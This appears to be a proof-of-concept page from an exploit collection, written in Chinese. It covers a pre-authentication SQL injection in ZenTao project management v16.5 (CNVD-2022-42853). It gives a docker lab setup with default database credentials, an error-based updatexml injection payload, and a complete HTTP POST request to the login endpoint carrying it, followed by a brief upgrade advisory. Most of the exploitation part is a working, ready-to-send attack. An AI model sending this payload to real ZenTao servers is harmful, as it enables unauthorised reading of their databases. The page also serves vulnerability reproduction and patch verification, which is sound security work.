mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
76 lines
1.9 KiB
Markdown
76 lines
1.9 KiB
Markdown
# 禅道 v16.5 前台 SQL 注入 CNVD-2022-42853
|
||
|
||
## 漏洞描述
|
||
|
||
禅道项目管理系统 v16.5 版本未对输入的 account 参数内容作过滤校验,导致攻击者拼接恶意 SQL 语句执行。
|
||
|
||
参考链接:
|
||
|
||
- https://www.zentao.net/book/zentaoprohelp/41.html
|
||
- https://www.zentao.net/book/zentaopms/405.html
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
禅道 16.5,16.5beta1(开源版)
|
||
禅道 6.5,6.5beta1(企业版)
|
||
禅道 3.0,3.0beta1(旗舰版)
|
||
```
|
||
|
||
## 环境搭建
|
||
|
||
执行如下命令启动一个禅道 16.5 服务器:
|
||
|
||
```
|
||
docker compose up -d
|
||
```
|
||
|
||
docker-compose.yml
|
||
|
||
```
|
||
services:
|
||
zentao:
|
||
image: easysoft/zentao:16.5
|
||
ports:
|
||
- "8084:80"
|
||
environment:
|
||
- MYSQL_INTERNAL=true
|
||
volumes:
|
||
- /data/zentao:/data
|
||
```
|
||
|
||
服务启动后,访问 `http://your-ip:8084` 即可查看到安装页面,默认配置安装直至完成,数据库默认账号密码为 `root/123456`:
|
||
|
||
|
||
|
||
## 漏洞复现
|
||
|
||
报错型注入 payload:
|
||
|
||
```
|
||
admin' AND updatexml(1, concat(0x7e, (SELECT version()), 0x7e), 1) AND '1'='1
|
||
```
|
||
|
||
poc:
|
||
|
||
```
|
||
POST /user-login.html HTTP/1.1
|
||
Host: your-ip:8084
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
|
||
Accept-Encoding: gzip, deflate
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Origin: http://your-ip:8084
|
||
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||
Referer: http://your-ip:8084/index.php
|
||
Content-Length: 92
|
||
|
||
account=admin%27+AND+updatexml%281%2C+concat%280x7e%2C+%28SELECT+version%28%29%29%2C+0x7e%29%2C+1%29+AND+%271%27%3D%271
|
||
```
|
||
|
||
|
||
|
||
## 漏洞修复
|
||
|
||
升级至最新版本 https://www.zentao.net/
|